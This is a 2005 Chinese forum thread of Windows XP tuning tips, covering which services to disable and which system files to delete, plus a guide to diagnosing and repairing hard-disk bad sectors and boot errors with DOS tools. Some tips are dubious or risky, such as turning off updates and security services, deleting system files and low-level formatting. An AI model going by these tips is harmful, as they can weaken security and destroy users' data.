                  里面有很多服务是没用的，开启只会浪费内存和资源。影响启动度。关闭里面无关紧要的服务可以加快启动速度，减少负担。点击“开始”→“运行”，输入命令
                    “services.msc”　 ，打开“服务”对话框，(注意：必须以管理员或Administrators
                  组成员身份登录才能完成该过程。如果计算机与网络连接，则网络策略设置也可以阻止您完成此步骤。)
                  设定时右击一个服务，可以选择关闭，手动，还是自动．
                  自动为跟Windows一起启动。
                  手动为需要时它自行启动。
                  关闭为永远不启动。（红色表示核心服务，不能关）
                  以下为一些不常用的服务:
                  Alerter -错误警报器。禁用 (手动
                  Application layer gateway
                  service：给与第三者网络共享/防火墙支持的服务，有些防火墙/网络共享软件需要。占用1.5兆内存。
                  Application management：用于设定，发布和删除软件服务。
                  Automatic Updates -windows自动更新，不影响手动更新。禁用 （自动）
                  Background intelligent transfer
                  service：这个服务原是用来实现http1.1服务器之间的信息传输，微软称支持windows更新时断点续传。
                  Clipbook -与局域网电脑共享粘贴/剪贴的内容。禁用 (手动
                  Distributedlinktrackingclient－用于局域网更新连接信息。手动（自动）
                  DistributedTransactioncoordinator－并行处理使用，如果你不是服务器的话，就禁用（手动）
                  DNSClient－ＤＮＳ解析服务。服务器用。手动（自动）
                  Error Reporting Service -错误报告器。禁用（自动）
                  EventLog-系统日志纪录服务，用于查找系统毛病．自动
                  Fast User Switching Compatibility －多用户快速切换服务，不如用注销了。禁用(手动
                  Help and Support -帮助。手动 (自动
                  Human Interface Device Access -支持多媒体键盘等HID设备。手动
                  IMAPI CD-Burning COM Service -有其他的刻录软件就不需要了,占用１.６兆，禁用
                  Indexing Service -索引服务，用于快速查找文件，关闭也能查。手动
                  IPSEC Services -安全方面的。手动 (自动
                  messenger-局域网内利用netsend命令传递消息。禁用（自动）
                  MSsoftwareshadowcopyprovider－软件备份。禁用
                  NetMeeting Remote Desktop Sharing -用Netmeeting实现电脑共享。禁用 （手动）
                  NetLogon－登陆domain，如果局域网是工作组方式或是个人用户，请禁用
                  NetworkConnections-上网／局域网要用的！自动
                  Network DDE -禁用 （手动）
                  Network DDE DSDM -禁用（手动）
                  NetworkLocationAwareness－如有网络共享或ICS/ICF可能需要.(服务器端)手动
                  NTLMSecuritysupportprovider－安全方面的。禁用
                  NVIDIA Driver Helper service：nvidia 显卡帮助，关！
                  Performance Logs and Alerts -记录机器运行状况而且定时写入日志或发警告。手动
                  PlugandPlay-自动检测新装硬件。自动
                  Portable Media Serial Number -禁用（自动）
                  Print Spooler -打印机服务，关掉就无法打印了，视情况而定。手动
                  ProtectedStorage－储存本地和网上服务密码，包括填表时的"自动完成"等功能。自动
                  QoSRSVP-个人用户用不着。手动
                  Remote ProcedureCall(RPC)-系统核心服务！自动
                  Remote ProcedureCallLOCATOR－管理RFC数据库服务，手动
                  Remote Desktop Help Session Manager -远程帮助服务，禁用 （手动）
                  Remote Registry -远程注册表运行／修改。大漏洞，禁用（自动）
                  Removablestorage　－磁带备份用的。禁用
                  Routing and Remote Access -路由服务。禁用
                  Secondary Logon -给与administrator以外的用户分配指定操作权．手动（自动）
                  Security Accounts Manager
-像ProtectedStorage,IISAdmin才需要。手动（自动）
                  Security Center -windows安全中心　 可以禁用
                  server-局域网文件／打印共享需要的。自动
                  SSDPDiscoveryservice－没有什么硬件利用这个服务。禁用　 自己看还是保留好
                  shellhardwaredetection－不清楚，自动
                  Smart Card -智能卡服务，我没用过占1.4兆 可以关掉。手动
                  Smart Card Helper -智能卡帮助，手动
                  system event notification：记录用户登录／注销／重起／关机信息。手动（自动）
                  System Restore Service -系统还原服务，自己决定。我选禁用 （自动）
                  task scheduler：windows 计划服务啦，禁用（自动）
                  terminal services：实现远程登录本地电脑，快速用户切换和远程桌面功能需要，不用这些功能就关了吧。禁用（手动）
                  themes-关掉了就没有漂亮的界面了。自动
                  Telephony-拨号服务，如果你的宽带不用拨号，那么关了它。
                  telnet：大漏洞，我第一个关的就是这个．这根dos中telnet命令没关系２兆内存。禁用（手动）
                  TCP/IP NetBIOS Helper -如果你的网络不用Netbios或WINS，就禁用
                  Uninterruptible Power Supply -UPS用的吧。手动
                  universal plug and play device host：同SSDP Discovery Service
                  ，禁用 ．
                  Upload Manager -用来实现服务器和客户端输送文件，简单文件传输不需要这个！手动（自动）
                  Volume Shadow Copy -同MSSoftwareShadowCopyProvider。手动
                  WebClient -可能和以后的.net技术有联系，我用手动
                  WindowsAudio-　关了就没声音了！自动
                  windows Time -网上时间校对。手动 （自动）
                  Windows Installer：windows的MSI安装服务，建议设成手动。
                  windows image acquisition
                  (WIA)：为扫描仪和照相机提供图像捕获，如果你没有这些设备，建议改为手动启动或干脆关闭它
                  WindowsManagementInstrumentation-核心服务。自动
                  windowsmanagementinstrumentationdriverextensions－没上面的重要，手动
                  Wireless Zero Configuration -无线网络设置服务。手动（自动）
                  WMI Performance Adapter -不清楚。手动或关！占用６兆内存．
                  ComputerBrowser-用来浏览局域网的服务，但关了也不影响浏览！手动 （自动）
                  Workstation-很多服务都依靠这个服务，支持联网和打印／文件共享的。自动
                  XP系统文件大删除

                  如何安装系统5

                  出于各种考虑，在XP系统安装目录中有许多不会造成任何影响的文件。下面看看哪些是可精简的内容。
                  一、从“我的文档”开始清理
                  “我的文档”在系统中称为“Documents and
                  Settings”，这也是XP中比较特殊的目录，它记录了了用户的一些特别的文件信息。下面来看看有什么内容是可以删除的。
                  C:\ Documents and Settings\All Users\Application
                  Data\Microsoft\Media Index
                  这个文件夹与WMPS8有关，如果已升级到WMP9，那就可把它删除。
                  C:\ Documents and Settings\All Users\Application
                  Data\Microsoft\Media Player
                  这个文件夹与WMP9有关，如果不常用WMP9，就可以删除它，它不会影响以后使用WMP9。因为在下次使用WMP9时，系统会自动重建这些内容。
                  C:\ Documents and Settings\All Users\Application
                  Data\Microsoft\User Account Pictures\Default Pictures
                  在设置账户或使用MSN时都会使用到.这些图片没什么特别,可以删除,也可以用自己喜欢的图片来替代。
                  C:\ Documents and Settings\All Users\ Documents（或Shared
                  Documents）\My Music
                  这个目录比较特殊，它显示的名字与工具栏中显示的名字有所不同。进入这个目录的实际步骤是：
                  “C:\ Documents and Settings\All
                  Users\”→“共享文档”→“共享音乐”。一般用户不会把音乐文件放在这里，如果不放这里，则可删除它。
                  C:\ Documents and Settings\All Users\ Documents（或Shared
                  Documents）\ My Pictures
                  与My Music目录相似，如果不把图片放在这里，则可删除它。
                  C:\ Documents and Settings\用户名\ My Documents\My Music
                  一般人们都在硬盘中开辟专门的存放音乐的地方，那么把它删除吧。有一点要注意，如果经常播放WMA文件，难免会下载一些音乐播放许可证到本地硬盘，而系统默认会把这些许可证放在这个目录中，如果在目录中看到“许可证备份”目录，建议把它复制到其它位置，并在WMP的：工具/许可证管理“中更改路径。当然也可删除该证，下次播放时会自动从网上下载此证。
                  C:\ Documents and Settings\All Users\[开始]菜单\程序\附件\辅助工具
                  这里存放着系统辅助功能向导的程序快捷方式，这为有特殊需求的用户准备的，如果你没特别的使用习惯，则可删除。
                  C:\ Documents and Settings\All Users\[开始]菜单\程序\附件\通讯
                  这个也可完全删除,因为它只是一些快捷图标。
                  C:\ Documents and Settings\用户名\[开始]菜单\程序\附件
                  这个目录是一些程序的快捷图标。在附件中真正用到的功能很少，常用的只有“记事本”、“Windows资源管理器”。把这些要的程序复制到“C:\
                  Documents and Settings\All Users\[开始]菜单\程序\附件”中，然后再删除此目录。
                  C:\ Documents and Settings\用户名\Favorites
                  这里的快捷图标，“MSN。com”和“Radio Station Guide”，这些你用过吗？没用就删吧。
                  C:\ Documents and Settings\用户名\Favorites\Links
                  与上面一样，如果用不到，就可删除这个目录。在这里还要修改一下注册表，以永久删除链接文件夹。在注册表中找到
                  “HKEY_CURRENT_USER\Software\ Microsoft\Internet
                  Explorer\Toolbar”项，在右侧中将“LinksFolderName”的值删除。
                  二、对程序文件动手
                  “C:\Program Files”大家很熟悉，因为在安装程序时，其默认的安装路径就在这里。下面看看里面有什么内容。
                  C:\Program Files\Windows Update
                  这个目录用于升级，可以删除。只要再次登录Windows的升级网站进行升级，这个目录系统就地自动重建。
                  C:\Program Files\Windows Media Player\Skins
                  这是WMP自带的“皮肤”，相信很多“皮肤”不会用到，不如只留下几个常用的，把其余的删掉。
                  C:\Program Files\Common Files\Microsoft Shared\Stationery
                  这是Outlook中的信纸图案，有用的留着，不用到的就删除。如果不用Outlook收发邮件，则全部删掉。
                  C:\Program Files\Internet Explorer\SIGNUP
                  这里放着一个程序的快捷方式，用以启动进行网络设置向导，如果你的网络一切正常，也不需要向导的帮助，那就删除它吧。
                  三、Windows目录同样可清理
                  不要被“C:\Windows”所吓倒，这里同样有不少东西可删除.在这个目录下，.BAK、.BMP、.OLD、.TMP类型的文件可以删除。除
                  SchedLgU.txt(它被用于计划任务程序服务，.TXT文件也可删除。Notepad.exe和TASKMAN.exe也可删除，因为在
                  “System32”目录下还有一个备份。另外，clock.avi、Control.ini文件也可删除,它不会对系统造成任何影响。
                  C:\Windows\$NtUninstall$
                  这是在线升级Windows时，系统自动创建的目录，其作用是方便卸载已安装的系统补丁。如果补丁正常运行了，这些目录就无意义了，可安全删除这些目录及文件。你可在“添加或删除程序”中去卸载这些补丁，当然补丁并没有真正删除，只是让“添加或删除程序”窗口变得干净些。
                  C:\Windows\Cursors
                  这个目录里是鼠标方案，如果用不上，就删吧。
                  C:\Windows\Help
                  在第一次运行Windows XP时，系统总会提示运行“漫游Windows
                  XP”，中文版使用的是一个HTML格式的文件，只有文件，没有声音。其实在系统中还安装英文版的漫游功能，虽然是英文，但有语言，有音乐，还有漂亮的动画。它就是“Tours/mmtour”
                  目录中的“tour.exe”。如果没有用了，则可将“Tours”整个目录删掉。在这之前，应先在“C:\Windows\
                  System32\dllcache”中删除“tourstrt.exe、tourW.exe以及“C:\Windows\
                  System32”目录下的“tourstart.exe”文件。
                  C:\Windows\inf
                  在这个目录中会看到很多相同文件名，不同后缀的文件，分别为.inf和.pnf
                  ，.pnf是.inf文件的预编译文件，如果没有.pnf文件，.inf文件运行时会自动建立相应的.pnf文件。因此，这个目录的所有.pnf文件都可以删除。
                  C:\Windows\Media
                  这是系统自带的一些MID和WAV音效，喜欢的留下，不喜欢的也可删除。
                  C:\Windows\Temp
                  这是临时文件夹，当然可删除。但有一点要注意，最好是在启动系统后才删除，因为有很多软件的安装程序会在重新新启动后利用这里的文件来完成最后的安装。
                  C:\Windows\Web
                  这里的“gif”和“htm”文件均可删除。到“Wallpaper”目录中看看，系统自带的大部分桌面背景都在这里，不喜欢的均可删除。
                  C:\Windows\System32
                  这里有很多名如“1033”的文件夹，这些主要存放系统出现的错误报告，其中大部分是空文件夹，这些空文件夹可放心删除。
                  C:\Windows\System32\Direct\Dinput
                  这个目录里的文件主要是游戏设备的配置文件，如果用不上，就删吧。
                  C:\Windows\System32\ReinstallBackups
                  这里有很多子目录，它们分别是电脑中硬件的驱动程序备份。如果对某一硬件进行升级或更换，并且确定不会再使用原来的驱动程序，则可以删除相应的目录。
                  另外，还可在系统中搜索“desktop.ini”文件，并全部删除。如果某个“desktop.ini”文件是系统需要的，那么系统会在需要的时候重新创建它。在C盘根目录下有AUTOEXEC.BAT、CONFIG.SYS、IO.SYS和MSDOS.SYS这四个文件，如果为0字节，则可删除
                  补充一下如果是在DOS方式下安装Windows
                  2000/XP系统，首先需要运行Smartdrv.exe命令，这样才能使安装程序可以快速地安装，否则等待的时间将是非常漫长的。

                  做爱做的事
                    ●～　　●～　　　●～　　　　●～　　　●～ ……
                  ○　 ●～　 ●～　 ●～
                       ●～　●～　●～　　　●～　　……
                  [2 楼] From:山东省潍坊市 | Posted:2005-05-30 08:37|

            小强

             多看A片不好

            级别: 掌柜
            精华: 5
            发帖: 375
            威望: 397 点
            取之币: 5625 NB
            贡献值: 1 点
            在线时间:172(小时)
            注册时间:2005-05-18
            最后登陆:2005-11-12

                  硬盘坏道的发现与修复大全 原文ouyi发表

                  就算硬盘的日常使用与维护再好，都有可能产生坏道（其中的原因很多，比如：硬盘的质量问题等）。一旦硬盘出现了坏道，大家也不必惊慌，我把一些识别与修复硬盘坏道的方法告诉大家，帮助大家度过难关。

                  硬盘的坏道共分两种：逻辑坏道和物理坏道。逻辑坏道为软坏道，大多是软件的操作和使用不当造成的，可以用软件进行修复；物理坏道为真正的物理性坏道，它表明硬盘的表面磁道上产生了物理损伤，大都无法用软件进行修复，只能通过改变硬盘分区或扇区的使用情况来解决。
                  知道了硬盘产生坏道的原理，现在让我们来看看硬盘产生坏道的一般现象。
                  在你打开、运行或拷贝某一文件、程序时，硬盘的操作速度变慢，长时间反复读盘，然后出错，或Windows提示“无法读取或无法写入文件”，严重时出现蓝屏等现象。
                  硬盘读写的声音由原来的“嚓嚓”的摩擦声变为怪声。
                  每次进入系统时都自动运行Scandisk进行硬盘扫描，或硬盘扫描时出现红色的“B”的标记。
                  在排除病毒的情况下，电脑启动时无法从硬盘引导。自检时，屏幕提示“Hard disk drive failure”或“Hard
                  drive controller failure”及类似信息。
                  硬盘无法启动时，用软盘进行引导，出现“Sector not found”或“General error in reading
                  drive C”等信息。还有就是可以转到硬盘所在盘符，但无法进入。

                  ●二、检查病毒及处理方法：
                      硬盘出现软故障时，在启动后屏幕显示“Invaild Partition
                  Table”(无效分区表)，这时应该首先想到可能是病毒原因所造成，而且通常是致命性病毒将DOS分区或DOS引导记录破坏。
                  病毒的目的就在于破坏系统，尤其是操作系统型病毒，它以病毒区取代正常操作系统的引导部分。在系统启动时，病毒进入内存，一旦这类病毒直接或间接得以运行，必将破坏硬盘系统。硬盘出现了软故障，必须查找这方面的原因。用清毒盘检测硬盘，发现病毒应及时清除。重新用C盘引导系统，如不成功，可重新向C盘传送系统。如还不能正常启动，将备份DOS分区表拷入硬盘，如再不行，只能采取硬盘初始化。有些病毒用手中的清毒盘未必能检查出来，我们可以借助于
                  DEBUG、PCTOOLS等工具进行检测和清除。

                  ●三、检查转盘情况及处理方法：

                  1.A驱正常启动后转入C盘时失效，屏幕出现“Invaild Drive Specification”。
                  从提示看，系统不承认硬盘的存在。这时如果CMOS设置是正确的，通常认为是硬盘“0”磁道坏使磁盘中“0”柱面“1”扇区中分区表损坏。
                  处理方法：用A盘引导系统后，重建DOS分区，将引导分区改在1柱面，对磁盘进行高级格式化。
                  2.C驱自举失败，A盘启动后转入C盘成功。
                  笔者发现，有时CMOS中硬盘参数不正确，虽A盘启动可正常转入C盘，但C盘不能启动，读写不正常，有时只能列目录。如果CMOS参数正确，多数原因在于
                  C盘DOS系统文件错误。故障现象为启动C盘后，屏幕会出现“Error Loading Operating
                  System”(错误安装DOS)或“Missing Operating System”(DOS丢失，系统破坏)等提示。
                  处理方法：用干净系统盘(DOS版本与C盘一致)从A驱启动，删除C盘上的DOS系统文件，利用SYS命令传送系统到C盘。
                  通过“三检”之后如仍不能排除软故障，在确认无硬故障的情况下，我们只能采取对硬盘初始化的办法排除软故障。所谓硬盘初始化，指的是对硬盘低级格式化、分区、高级格式化。低级格式化可采取CMOS设置状态中的功能选项进行操作，也可以采用DM、DIAGS、SETUP等软件来完成；分区、高级格式化均可采取DOS命令完成(分区：A：\FDISK←；高级格式化：A：\FORMAT
                  C：/S←)。
                  对故障进行检查、处理固然重要，但防范措施也很重要。如定期检测磁盘，尽量不使用外来盘，即使要使用，运行前先用病毒清洗盘进行检测，以预防病毒；定期检查、更换后备电池，正确配置CMOS参数；备份
                  CMOS参数、DOS分区表和DOS引导记录等。这些工作平时做好了，可以有效地预防硬盘软故障的发生。即使出现了故障，也能迅速加以排除，保护好硬盘数据。

                  硬盘软故障的检查办法

                  由于计算机硬盘存储容量大，读写速度快，且安装在一个密闭腔体内，工作环境清洁、性能较稳定、使用方便，因此，在微机中得到广泛的应用。但如果对硬盘使用不当或感染病毒后，容易引发故障。硬盘故障分为硬故障和软故障两大类，其中软故障出现较频繁。故障现象大都表现为硬盘不能自启动。当硬盘出现软故障时，采取行之有效的应急处理很重要，下面介绍的“三检”只是相对于最常见的故障情况而进行的检查、处理步骤。
                  ●一、检查CMOS设置及处理方法：
                  CMOS系统设置错误所引起的硬盘软故障，现象表现不一。有的开机后屏幕无显示，有的仅显示一个死光标，有的显示“Non-System
                  Disk Error”(非系统盘或盘出错)等提示。特别是在从A盘转入C盘时，屏幕出现“Invaild Driver
                  Specification”(无效驱动器)，令用户误以为硬盘“0”磁道坏或硬盘系统破坏等，从而采用低级格式化、重建DOS分区、重新拷入DOS系统和高级格式化等方法。虽然对硬盘初始化可以排除软故障，但硬盘数据却被破坏。所以，由于CMOS设置错误引发的软故障不用重新设置CMOS的办法去解决，必然有所损失。而且因CMOS设置错误引起的软故障较普遍，我们在检查软故障时最好第一步从检查CMOS系统设置入手。
                  检查和处理方法：
                  首先检查后备电池是否失效，如失效则更换电池，再进入CMOS设置。对于高档微机，可以开机后按Del、Esc键或Ctrl-Backspace、
                  Ctrl-Alt-Esc等组合键进入CMOS设置状态。对于低档机，只能从A驱动器引导SETUP软件进入CMOS设置状态。CMOS检查中，重点检查
                  CMOS系统设置中硬盘参数是否正确，特别是检查硬盘类型号(TYPE)与硬盘驱动器厂家提供的参数是否相一致。如果发现错误，将参数更改为以前备份好的正确参数，保存后退出CMOS设置再重新用硬盘引导系统。万一找不到备份参数，对于有些高档机器，可以采用CMOS设置中的功能选项“HDD
                  AUTO
                  DETECTION”(硬盘自动检测)来找到正确的硬盘参数。如果CMOS设置中无此选项，可以打开机器，硬盘表面一般都有一个标签对硬盘参数进行介绍。即使没有介绍，至少标明此类硬盘的名称，再根据硬盘名称查阅各类硬盘参数资料，就可以查到正确配置参数。另外，借助于DM等应用软件也可以检测到硬盘的参数(条件是A驱必须能自举)。

                  系统不认硬盘的常规处理方法

                  系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS
                  中的自动监测功能也无法发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。

                  CMOS引起的故障
                  CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持"IDE Auto
                  Detect"的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用"Normal,LBA,Large"等，如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。
                      主引导程序引起的启动故障
                  主引导程序位于硬盘的主引导扇区，主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软驱或光驱启动之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的FDISK最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，FDISK.EXE之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS
                  3.x到Windos 95的DOS，只要找到一种DOS引导盘启动系统并运行此程序即可修复。

                  分区表错误引发的启动故障
                  分区表错误是硬盘的严重错误，不同的错误程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过FDISK重置活动分区进行修复。
                  如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32MB的基本DOS分区值为06，而扩展的DOS
                  分区值是05。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。　　分区表中还有其它数据用于记录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，可用的方法是用备份的分区表数据重新写回，或者从其它的相同类型的并且分区状况相同的硬盘上获取分区表数据。
                  恢复的工具可采用NU等工具软件，操作非常方便。当然也可采用DEBUG进行操作，但操作繁琐并且具有一定的风险。

                  硬盘使用的维护与优化
                  如果把CPU比作计算机的“心脏”，主板比作神经系统，那硬盘就好像计算机的“大脑”一样，我们的操作系统、数据文件、个人信息等内容都存储于其中。一旦这个“大脑”发生什么问题，不但我们的计算机会瘫痪，存储于内的劳动成果也会付诸东流。
                  硬盘的正确安装
                  硬盘的安装不同于其他部件，它是怕撞击震动的易损部件，所以安装的时候要注意轻拿轻放，在移动中也要避免强烈的震动，以免损坏硬盘盘片，造成不可修复的物理损伤。
                  大多数硬盘都安装在机箱的3.5英寸固定架上而不是安装CD－ROM的5寸固定架。首先要将硬盘轻轻放入插槽内，并将硬盘上的螺丝孔对准插槽固定架上的螺丝孔，然后用螺丝钉对硬盘进行固定。

                  数据线
                  目前，我们所使用的硬盘都为ATA66或更高规格的产品，因此IDE数据线也均为80芯的ATA133/100/66
                  IDE硬盘线。所有符合AC97规范的IDE数据线共有三个接口，均采用彩色标识，其中，蓝色的为系统接口，用于和主板上的IDE接口相连。黑色的为
                  Master（主设备）接口，灰色的为Slave（从设备）接口，都是用来接硬盘、光驱等IDE设备的。
                  如果硬盘设定为主设备，则一定要安装在IDE数据线的主设备接口上；如设定为从设备，就一定要安装在从接口上，否则就会发生错误。标准的IDE数据线，不同颜色的接口用途不同。在连接数据线时，注意不要接反。

                  硬盘跳线
                  除了接线外，硬盘安装过程中另一项不可忽视的内容就是硬盘的主从设备跳线。当然，主从盘跳线只在两块硬盘同时连接在一根数据线上时才需要。因为硬盘出厂前的默认设置均为主盘（即Master），如果数据线只连接了一块硬盘，那它当然就是主盘，所以安装单硬盘时不需要进行跳线设置。
                  对大多数硬盘来说，跳线规格共有三种：Master(主)、Slave（从）和Cable
                  Select（线缆自动选择）。当我们选择第三种规格的时候，计算机会自动设置硬盘的主从模式。至于跳线的设置方法，大多数厂商都会在硬盘背面给出详细的跳线设置图。有的则是在跳线接口上方给出简单的示意大多数硬盘都在其背面提供了跳线设置图。
                  与硬盘相连时也要注意IDE数据线接口的正反，除了根据缺口判断之外，还要记住，IDE数据线有红色线的一边应该靠近硬盘电源接口方向。有的硬盘则是在其侧面提供跳线的设置方法。硬盘的电源接口采用D型接口，因此无法反方向插入，避免了因误操作而烧毁硬盘。

                  硬盘常见故障及其处理方法
                  1． 电源引起的硬盘不能正常起动
                      计算机电源输出的电压分别是＋5V和＋12V。硬盘启动需要＋12V电压和4A的电流，硬盘工作时的电流为1.1A。软盘的启动仅需＋10V左右的电压和1.3A电流，而工作电流为0.5A。计算机电源的输出电压不足＋12V，则硬盘就不能启动和工作。处理这类故障，就要使电源输出恢复到＋12V电压。

                  2．主板电池电压不足引起的硬盘无法启动
                      这是主板上的充电电池失效引起主机参数紊乱而产生的故障。主板上的充电电池（一般是锂电池）是当主机关机时用来保存机器时钟、日期，软盘驱动器的个数、类型，硬盘个数、类型，显示器方式，内存容量，扩展容量等系统参数的。当开机上电自检时，BIOS自动检测CMOS中的参数表，如果不匹配，则出现死机。锂电池的工作电压为＋3V～＋6V。如果电池电压不足＋3V或电池失效，则硬盘无法被识别。

                  3．硬盘参数错误导致的硬盘不能启动
                      硬盘参数有硬盘容量大小、磁头数、磁道数、扇区数等多种。不同厂家生产的硬盘，其参数值各不相同。如果硬盘参数值设置错误，则硬盘就启动不了。这时需要重新设置硬盘的磁头数、磁道数、扇区数等值。方法是：首先开机后待自检开始，按下ＤＥＬ键，即可进入CMOS
                  SETUP设置状态。然后，对COMS中的参数进行设置：选择STANDARD CMOS
                  SETUP栏目中的TYPE项，填入正确的TYPE值。一般的主板都有硬盘自检测功能。进入CMOS
                  SETUP设置菜单中，选择“IDE HDD AUTO DETECTION”即可。

                  4．硬盘0磁道被破坏引起的故障
                      DOS操作系统放在硬盘的0磁道上　如果硬盘的0磁道物理性损坏，硬盘便不工作。
                      一般采用的修复方法是：首先尽量把硬盘有用的文件、数据备份出来。由于硬盘0磁道的损坏，硬盘中的资料、文件已不能按正常备份方法备份，需用BIOS
                  中断方法按扇区逐一备份；然后对整个硬盘做格式化，再用FDISK对硬盘重新分区，最后用FORMAT对硬盘作逻辑格式化，装上DOS操作系统和有关文件、数据即可。
                      若用上述方法修复无效，则先用KV300杀毒盘启动、杀毒，再用A：系统盘启动，运行SCANDISK扫描C盘，若在第一簇出现一个红色的“B”，表明零磁道损坏。然后用PCTOOLS
                  9.0中的DE（该软件能看到各个分区在硬盘的起始点），运行PCT90目录下的DE．EXE，报告现在运行在只读模式，选Op-tions菜单
                  →Configuration，按空格去掉Read
                  Only前面的√，保存后退出。选主菜单Select→Drive；进入后在Drive
                  type→Physical，按空格选定，再按ＴTab键切换到Druves项，选中harddisk，然后选OK回车。此后回到主菜单，打开
                  Select菜单，这时会出现Partiton
                  Table，选中之后出现硬盘分区表信息。该分区是从硬盘的0柱面开始的，那么，将分区的Beginning
                  Cylinder的0改成1即可　保存后退出。重新启动，按Delete键进入CMOS设置，进行“IDE HDD AUTO
                  DETECTIONＤ(也可以看到CYLS数变少)＂，保存后退出，此时再对硬盘重新分区，格式化，装上相应的软件即可。

                  硬盘引导型故障分析及排除
                  1． Invalid Drive
                  Specification　无效的驱动器号　：如果一个分区或逻辑驱动器在分区表里的相应表项已不存在，那么对于操作系统来说，该分区或逻辑驱动器也就不存在了。因此，这种故障问题一般出现在分区表。修复这类故障，最简单的方法是事先做好分区表的备份。例如，Pctools9.0、KV3000等都有这项功能。
                  2． HDD controller
                  failure　硬盘驱动器控制失败　：这是启动机器时，由POST程序向驱动器发出寻道命令后，驱动器在规定时间内没有完成操作而产生的超时错误。出现这种错误，硬盘可能已经损坏了。
                  3． C drive failure　硬盘C驱动失败　：RUN　SETUP　UTTLITY（运行设置功能）Press to
                  Resume（按键重新开始）：这种故障一般是因为硬盘的类型设置参数与格式化时所用的参数不符。由于IDE硬盘的设置参数是逻辑参数，所以这种情况多数是由软盘启动后，C盘也能够正常读写，只是不能启动。
                  4． 显示“Starting
                  Windows…″　然后死机：一般来说，这是由于Config.sys和Autoexc.bat中的可执行文件本身已经损坏，使得系统在执行到此文件是死机。这个故障非常简单，但因为没有什么故障信息，一般人很容易做出误判。当出现这种现象，并且确信系统本身是完好的时，可以去掉这两个文件，或者在屏幕上出现以上信息时，快速按下F8键，然后选择单步执行，找出已经损坏的文件即可。
                  5． Non－System Disk or Disk Error，Replace AND Press any key
                  when
                  ready（非系统盘或磁盘错误，重新换盘后按任意键），DOS引导区中的引导程序执行后发现错误，报此信息。可能导致该错误的原因有：硬盘根目录区第一扇区地址出界（在540MB之后），读盘出错。这类故障大多为软件故障，如果BPB表损坏，即用软盘启动后，硬盘不能正常读写，可以用NDD修复；如果
                  BPB表完好，只需简单的SYS C:传送系统就可引导。
                  6． Error Loading Operation
                  System　调进操作系统错误　：这类故障是在读取分区引导区（BOOT）出错时提示的，其原因可能如下：一是分区表指示的分区起始物理地址不正确。例如，由于误操作而把分区表项的起始扇区号（在第三字节）由1改为0，因而INT
                  13H读盘失败后，即报此错；二是分区引导扇区所在磁道的磁道标志和扇区ID损坏，找不到指定扇区；三是驱动器读电路故障。
                  7． HDC controller
                  fail（硬盘控制器控制失败）：这类故障是硬件故障，POST程序向控制器发出复位命令后，在规定的时间内没有得到控制器的中断响应，可能是控制器损坏或电缆没接好。另外，也与硬盘参数设置是否正确有关。

                  电脑综合诊治之硬盘故障详解
                  1、硬盘有坏道，不能正常装入WINDOWS或使用不稳定
                  解决方案：
                  1）用分区软件将坏道分为一个区或几个小区，然后将该分区删掉即可，此法适用于硬盘坏道比较集中的情况。
                  2）用NORTON8.0以上版本所带的WIPEINFO.EXE文件，擦除有坏道的驱动器再重装软件即可，此法适用于坏道比较分散的情况。
                  3）用DM软件低格硬盘。
                  4）用PCTOOLS9.0的DISKFIX修复硬盘。

                  2、用主板自带的低格程序低格硬盘后，硬盘数据仍然存在，与未低格前一样
                      此类现象比较常见，我们只要变换硬盘的mode模式即可解决问题，例如我们可以将LBA模式变换为normal或large模式，待低格硬盘后再变换为原来的LBA模式即可解决问题。

                      3、不能用FDISK进行分区，或某些分区不能删除
                      此类故障是由于分区信息有错误造成，一般是人为造成，我们在某些原装机上经常见到其某个分区不能删除的现象，其实它的那个分区是用来恢复系统所用，倘若我们要删除其分区以增大硬盘使用空间，可借助norton8.0自带的diskedit将其第一扇区的数据全部以“0”代替，然后写进去，即可予以解决。

                      4、计算机在内存检测完成后死机且键盘无响应
                      此类故障常见于现在的新式主板，如810、815主板，由于现在主板的IDE口设备都是每次启动电脑时自动检测设备，不是像以前的老主板在CMOS内检测硬盘，是以当电脑启动时若IDE设备接线错误，会导致电脑长时间检测IDE设备而停止响应。此时我们可以检测接线是否正确及IDE信号线有无问题来解决该故障。

                      5、硬盘主引导扇区损坏，系统无法引导
                  解决方案：
                  1、用FDISK/MBR命令恢复引导程序。
                  2、系统文件损坏后在其他机器上备份系统，用SYS命令重新传输系统即可（WIN95
                  、WIN98的系统文件可以共用）。6、提示C：DRIVE FAILURE RUN SETUP
                  UTILITY，PRESS（F1）TO RESUME
                      此类故障是硬盘参数设置不正确所以从软盘引导硬盘可用，只要重新设置 硬盘参数即可。

                      7、提示：NO ROM BASIC
                      此类故障是由于没有设置激活分区引起，用FDISK设置激活分区即可。

                      8、提示：MISSING OPERATING SYSTEM
                  解决方案：
                  1、进入CMOS重新设置硬盘参数。
                  2、系统引导标志被更改，如果分区信息在需要格式化，分区不在需要重新分区。

                      9、提示：NON—SYSTEM DISK OR DISK ERROR
                      解决方案：用软盘启动重新传输系统即可，如若不行，那就只有重新分区格式化了。

